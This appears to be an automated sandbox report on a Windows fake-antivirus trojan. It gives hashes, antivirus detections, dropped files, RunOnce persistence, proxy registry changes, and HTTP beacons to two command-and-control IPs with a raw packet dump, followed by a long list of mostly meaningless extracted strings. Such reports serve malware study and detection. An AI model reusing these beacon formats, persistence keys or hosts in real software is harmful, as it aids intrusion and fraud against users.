Analysis Date: 2015-10-04 21:15:49
MD5: 084f2c0a467dae0d0fee2fa5de258039
SHA1: a4837e80a359fdbb1a284913a82630e492fbf84b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 5a4513b970740ffb805e808cf6b18310 sha1: 060a4eb5d118d66e2354c9e276322af3abef48b8 size: 189440
Section .rdata — md5: 6840e6f20fc63e18ad1326a580df691a sha1: 6661ca95db0769ab90a8b2d46fccb8c303144af0 size: 2048
Section .data — md5: 4d7afaf048334883e2cf7e1b49b1f21d sha1: b1c2639089a018a77569505f4b5a10725ee433de size: 123392
Section .rsrc — md5: 876c3a6771eaa28691411359aae678b4 sha1: 8c48c956811369f398a114b8472352226087af8a size: 5120
Timestamp: 1970-01-07 07:02:22
PEhash: c4e0faadecb9320d765cd0c878406c4e14c97487
IMPhash: b3fb08000bf2c73a4d021514861a66a8
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV F-Secure: Gen:Heur.Cridex.2
AV Dr. Web: Trojan.Fakealert.20556
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV BullGuard: Gen:Heur.Cridex.2
AV Padvish: Error Scanning File
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997
AV CAT (quickheal): FraudTool.Security
AV Trend Micro: TROJ_FAKEAV.SMID
AV Kaspersky: Hoax.Win32.FlashApp.a
AV Zillya!: Trojan.FakeAV.Win32.113953
AV Emsisoft: Gen:Heur.Cridex.2
AV Ikarus: Trojan.Win32.Pakes
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV MalwareBytes: Trojan.Agent
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV K7: Trojan ( 001e60c61 )
AV BitDefender: Gen:Heur.Cridex.2
AV Fortinet: W32/FakeAlert.AMB!tr
AV Symantec: Trojan.FakeAV!gen39
AV Grisoft (avg): FakeAlert.AAS
AV Eset (nod32): Win32/Kryptik.MBU
AV Alwil (avast): MalOb-FY [Cryp]
AV Ad-Aware: Gen:Heur.Cridex.2
AV Twister: Trojan.F8292F1979200828
AV Avira (antivir): TR/FakeAV.btxt.7
AV Mcafee: Generic FakeAlert.amb
AV Rising: Trojan.FakeAV!49B1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe
Creates File: C:\a4837e80a359fdbb1a284913a82630e492fbf84b
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a2BFC.tmp
Deletes File: C:\a4837e80a359fdbb1a284913a82630e492fbf84b
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aD646.tmp"
Creates Process: "C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe" "C:\malware.exe"
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hLhPfFnEjAm05200 ➝
C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe\\x00
Creates File: C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aD646.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=05200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.77/i.php?affid=05200&v=2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30353230 30204854 54502f31   fid=05200 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3035 32303026 763d3220 48545450   d=05200&v=2 HTTP
0x00000020 (00032)   2f312e31 0d0a5265 66657265 723a2068   /1.1..Referer: h
0x00000030 (00048)   7474703a 2f2f3639 2e35302e 3139352e   ttp://69.50.195.
0x00000040 (00064)   37370d0a 41636365 70743a20 2a2f2f2a   77..Accept: *//*
0x00000050 (00080)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000060 (00096)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000070 (00112)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000080 (00128)   640d0a55 7365722d 4167656e 743a204d   d..User-Agent: M
0x00000090 (00144)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x000000a0 (00160)   61746962 6c653b20 4d534945 20372e30   atible; MSIE 7.0
0x000000b0 (00176)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000c0 (00192)   3b204754 42302e30 3b202e4e 45542043   ; GTB0.0; .NET C
0x000000d0 (00208)   4c522031 2e312e34 33323229 0d0a486f   LR 1.1.4322)..Ho
0x000000e0 (00224)   73743a20 36392e35 302e3139 352e3737   st: 69.50.195.77
0x000000f0 (00240)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000100 (00256)   3a203738 0d0a436f 6e6e6563 74696f6e   : 78..Connection
0x00000110 (00272)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000120 (00288)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000130 (00304)   63616368 650d0a0d 0a646174 613d3331   cache....data=31
0x00000140 (00320)   41454138 34334232 44323039 45463245   AEA843B2D209EF2E
0x00000150 (00336)   32354536 36394441 42303638 33373534   25E669DAB0683754
0x00000160 (00352)   33333939 37443733 38434630 43433644   33997D738CF0CC6D
0x00000170 (00368)   32323246 31324439 38413537 45373031   222F12D98A57E701
0x00000180 (00384)   30343126 763d32                       041&v=2


Strings
:
.
...
-0.
2
.
.
}
.
.
.v
[.
."
.P.
~
.
.
.
..X
.$.
.
1001
File
Main
MS Sans Serif
06y|'$zI
[-0_&8
-<0BwI@
0}`j=e
-0(LdcA
0-n2@&
^ 0ptt
0+[{q?q
1C]0*"
1L6~XWiv~;
1P&<4q
1	roIE
1WW8vV_[
.1zR.=
2}mztp2
2.[:N8{|?
2vg}B24N
3+,2+P
3+4	YK
3K)N.Q
|3Ko)G2i
3m@Tm].
^3z*G/
[4^bh~
	?4P	r,
4Z7!7PT
57O+{$
5FA1Dm=
&*5@is
@5jR;od
5\SYc3
)5XG,uX
-5XW-eYW-EY
,5XW-EZ
)5XW-EZ
5Z(cpC
64Dqjpr
6Bn(Z\
6fj$Pe
6J7?|<
6Q[3Dnf
6SLeJ	5f
6 T$"wt.
79[vp'
!7}BY+
7E#V:<
7m.8NhE,
7ninVi?
'7/o8=
+7T	\V
,>7>@U7
!8^8q"L
;/8:9S
8Aa[F{
8Lv6y>
8},WP64%
95M-a_
99\JUI
9\+DHL!
!9[!_g
9iVwF.zpf
	9l5AY,
a+(4huEBF
A.}8	H[
A@8mDh
Agzz[q
 Ahep:
Ai;WC`
A\lhq4q
a?LtOnU
AM"/xn
a{p+dva
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
Au6=4;
-a:)U>?|F
Au	@l:
+|B2~-
B5/p-P
B^9\:}
B)9dN<*d
BBe{H=
.{bd>;iep9
bEqaaq
>b-,gu
bidih3
BitBlt
#b$$J/M
&b`]K0
[\_|BOh
B<OI<k
B>oRkRm
BS^\53
B%TL7bH
*b&T|Ra]W
B/wMT2
C10gx|
c((2_m
CBDbka
`c&#e:n4
CG`yDmC
CharLowerA
CloseHandle
cm#\\:
CmhJtU
Cp.<^j"
CreateThread
c~=TCs
cvA,**
C<y|W}r
c+zS\h
|( ?;d
d )0u`
D1mw[v
+d3/MO
DA8 L5
|dab'i
D~AQ;g
@.data
DeleteCriticalSection
~DE,_P
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
Dgn?Lda
/+D~H[
d$jN$bk#"
~^DK@>
DndkXk[
,dO82T
DoB*bX
)d&P|dbV
:d{TRV
=DT;SMT
d+wT#'
dz`?eZn
dZlhoI3
;E|2C=$
e{2}rc
e|53v*
e%aiXt
eAsgT+
|EdBp'7*
	eE!o[>zt
=]Eij	v
e$j18=w4
+EL;aZA
,+E&{m
EnumSystemLocalesA
enz.dLR
_EqTxP
ExitProcess
ExitThread
$f0/h$L
FBocTvV
_Fbq^[
f|bTFj
FbYb|Wb
f{d.>-etV
FDvx8K
_F%[e5QH
F<~fk/
~F(K;Xck
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
|~f*)x
fXQWQ)
fyk-47
fZXoZvyh
G2cSF<X
gA_%V)
gBlChB
	}GC9&
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetFontData
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
gF(He;_
gFtNfB 
glqt@j&y
G@n`T4
}=gO)|
g+_PC@.}
:g:q-:
"g;;V_0
gx8Yz.
`g.#Zf[f
h02x9?
h3a~|i
.}Hb{l
h_C[g~
HcIc|"
HeapAlloc
HeapCreate
HeapFree
h?eIi-a2\eq
hFx)g{
_H/>]g
HIQldM
`hNuDX%
H-:_V"
h)V^e[}
h.-vfBf
,hxs-(
h"*y{$26T
"I08zq*
i5;PUO
i6,0eBz
I*(c,H
Idk.0?
`I,?fN^B
:I'i+|+J
InterlockedDecrement
InterlockedExchange
[IO@4v
}%ip~qWC
IsValidLocale
:iY~	*!
,~IY4	
J1LMR{1
&j2pk_
J3U HR
J~B6XCm
jE){Z[
jFiyHsmvI
J(+G9V
JLOmRDi
jp7$mq
:JT1;"
]#J	u?
JwJGwu
jwkj~'F
}Jz		n
K1a1y~
	K1IZ@&
k^360r
k&4no?I
\kB$JexrQ
KERNEL32.dll
kEVn9|(~P
kJ+ujt=
K	RRgF
KS5T.'
/Kt#c[n
kU,Kil3a
+K,uqi
kW7XD9g
*KW:[8i
K<:wo+
+k|wPH
+k_,;Z>
L1(c!)
<l2hNn{7
[l-	&3
language="*"
lBS+tX
LCMapStringA
ld8hmC
LeaveCriticalSection
lM`n1"
LocalAlloc
L+z^drg,
.=l+zHG
m50y`8
m\iFMO
Mj[oop
mLO2nO\
MSIMG32.dll
!m>:-T
m?VI5A
mWVM:_1
<n1sU	
name="Microsoft.Windows.Common-Controls"
N*@bO_
nbqIgU
nilE2[
$Nn3xZ
NnNOm;g<R$
nptmv+
n/TO(GrG
:N^UVw8
N}V,6wz
~nVpn:
n_z7vd
O26.;;
o3pxXx
o4+W~Vu
:*`O8a
>OA3Q~<
o;@AZZ@
[^Ob>S
OFLtd2
ogW$U%
o{@KKTI
|oMzg\W:
onJ/rqm
OOvpD'
oQYklc
o:rQ:6
|o)	S\
-os+Y.
oY&V_\P
//ozLT
p0=&BNO
p0eAP|X
pCg79cj,m
|~pEBj0
pe{/VuD
pH]BQ]
ph"ro/:z
.P?o*>
p>p:JU
:\pR)nHW
processorArchitecture="*"/>
|Pu5~z
publicKeyToken="6595b64144ccf1df"
>PYV?X
]pZ9Jz
Q6YP vg
Q[7gHb]
Q)Dvo#
qF!Fk%
qJD)QyJm
q;lH Y
Q/n1;&
%QOUTK6
Qqqre#
QrAEF)r
Q?%Ru_\
quz>y/
qyDFIp
R<\1tW
R5jpw	
r844%D
r~a`bu
\R C0B,h
`.rdata
]@r}ec
[;rERW
^RhxKZ
Rich$-
rk{V4Kx+
	rn[gvg
^Rr{f)+
Rt3YG]
RtlUnwind
'R'	To
~R_Ujy
(R_vRW
rZ-OEn
s18&>I
]S3jZrm#96
S70BGNm
sBg.}\d
SeJ*=e\	
SelectObject
SendMessageA
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
|shC|c
=sSW*Z
ST][C_h
s.U]`$
s>v+L;
;sx7=/s
SxDXj_]zD	&
tA66Jj
T;A:x,
Tc++:,6
!This program cannot be run in DOS mode.
t=i]zI
TL+LPEn
tqTtIrvU
tr8w[m:~
TransparentBlt
T,rLN-
^tsiZR
^(Tu]'
T>V+@E
tW=AT13=
type="win32"
=(t@Zr
U|%6S_
`U*c/v
u%C-yBC
-UCzP;
+uHB?!
ujw[Q0{S]
u[mzjW
>Urhb+he
USER32.dll
u_V7M(JuNKU
uW0OC@
]Uw1/[
~Uwf:LZg
)u\<.wvB
uZ~GVQ
V7F-^b
vc4i7z
vcMU(Az
version="6.0.0.0"
vfzOUz
vh9p^T
Vi|D{)g0
VirtualAlloc
VirtualFree
VirtualQueryEx
Vmzw(J8
[vR4CIxu
v{TeK(
V<u[Kf
|vx3zyQ
VxOj/a?
wCVa@n
W-E*kJE
wJC6Ky
WMEfT'
WN=ap0!
wnm5Rm
 `W%p-qi?
w\r9p[
WriteConsoleA
WTuRe-
	W^U)b
wV99*i
 W-!+yi
"w>zC$
X{1:A$
X	2-Q:`F
X2t,~8
X8ba{@
(X8Hq-
x}aQ{%
/xC\::"
X%dZa<dWT
Xk	M/N
xl`f<zE
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xNx[T6:
-xP*n+
XR8,$Z
(x!S vh
xt;SQW
Xvm<JS
XW-eY'
}X Ws/
( %-Y{!
Y6H`;`
Y7],Wh
YCANdm#m_
YG.fju'
Ylz`GJq
y)*oPP
y<%pTG4
yqRHE 
YrA<z.
>yS@`h
~'ysmww
y`>U8G
yUEf*2l!
#Y'USH
!yUv#	
Y#-w.a
)Z/]|%
/@_z0d
z2nl4&
Z7/5^W-
}Z7(wy
Z<@AheQ
zaR?X\
|z,asnzm
Z]B	t 
zCPJQg$
z\\I^'
z=-jQyD
Z\M|C\{
ZNox w1
!Zo?+{
:-zOZd
zPm?u;^n
ZpPdNS!d
zt8h0.,
zv4My_